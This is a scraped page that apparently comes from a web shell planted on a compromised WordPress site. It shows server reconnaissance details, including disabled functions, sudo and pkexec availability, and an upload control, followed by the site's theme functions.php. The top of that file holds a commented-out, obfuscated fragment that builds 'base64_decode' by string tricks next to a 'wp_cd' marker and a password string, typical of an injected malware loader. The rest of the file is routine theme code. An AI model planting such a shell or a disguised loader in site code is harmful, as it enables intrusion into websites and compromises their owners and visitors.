Server IP : 104.21.38.3 / Your IP : 172.70.147.106 Web Server : Apache System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/coircraft.com/wp-content/themes/coircraft/ |
Upload File : |
<?php @ini_set('display_errors', '1'); ini_set('display_startup_errors', 1); error_reporting(E_ALL); // global $zeeta; // if (!$npDcheckClassBgp && !isset($zeeta)) { // $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK0ubQgN4pBWZv2dPRfXN70cmCWIX7HVoQ=="; // if (!function_exists('get_data_ya')) { // $npDcheckClassBgp = 'aue'; // $zeeta = "yup"; // } // } function customtheme_setup() { load_theme_textdomain( 'customtheme' ); add_theme_support( 'automatic-feed-links' ); add_theme_support( 'title-tag' ); add_theme_support( 'post-thumbnails' ); add_image_size( 'customtheme-featured-image', 2000, 1200, true ); add_image_size( 'customtheme-thumbnail-avatar', 100, 100, true ); $GLOBALS['content_width'] = 525; register_nav_menus( array( 'top' => __( 'Top Menu', 'customtheme' ), 'social' => __( 'Social Links Menu', 'customtheme' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'comment-form', 'comment-list', 'gallery', 'caption', ) ); /* * Enable support for Post Formats. * * See: https://codex.wordpress.org/Post_Formats */ add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'gallery', 'audio', ) ); // Add theme support for Custom Logo. add_theme_support( 'custom-logo', array( 'width' => 250, 'height' => 250, 'flex-width' => true, ) ); // Add theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); } add_action( 'after_setup_theme', 'customtheme_setup' ); function customtheme_widgets_init() { register_sidebar( array( 'name' => __( 'Sidebar', 'customtheme' ), 'id' => 'sidebar-1', 'description' => __( 'Add widgets here to appear in your sidebar on blog posts and archive pages.', 'customtheme' ), 'before_widget' => '<section id="%1$s" class="widget %2$s">', 'after_widget' => '</section>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); } add_action( 'widgets_init', 'customtheme_widgets_init' ); function customtheme_excerpt_more( $link ) { if ( is_admin() ) { return $link; } return $link; } add_filter( 'excerpt_more', 'customtheme_excerpt_more' ); // Hook in very late, let the theme fix it first. add_filter( 'wp_title', 't5_fill_static_front_page_title', 100 ); /** * Fill empty front page title if a static page is set. * * @wp-hook wp_title * @param string $title Existing title * @return string */ function t5_fill_static_front_page_title( $title ) { // another filter may have fixed this already. if ( '' !== $title or ! is_page() or ! is_front_page() ) { return $title; } $page_id = get_option( 'page_on_front' ); $page = get_page( $page_id ); if ( ! $page or '' === $page->post_title ) { $title = get_option( 'blogname' ); } else { $title = $page->post_title; } // We don’t know if there is any output after the title, so we cannot just // add the separator. We use an empty space instead. return "$title "; } // insert code in child theme funtions.php file add_filter( 'caldera_forms_phone_js_options', function( $options){ //Use ISO_3166-1_alpha-2 formatted country code $options[ 'initialCountry' ] = 'IN'; return $options; });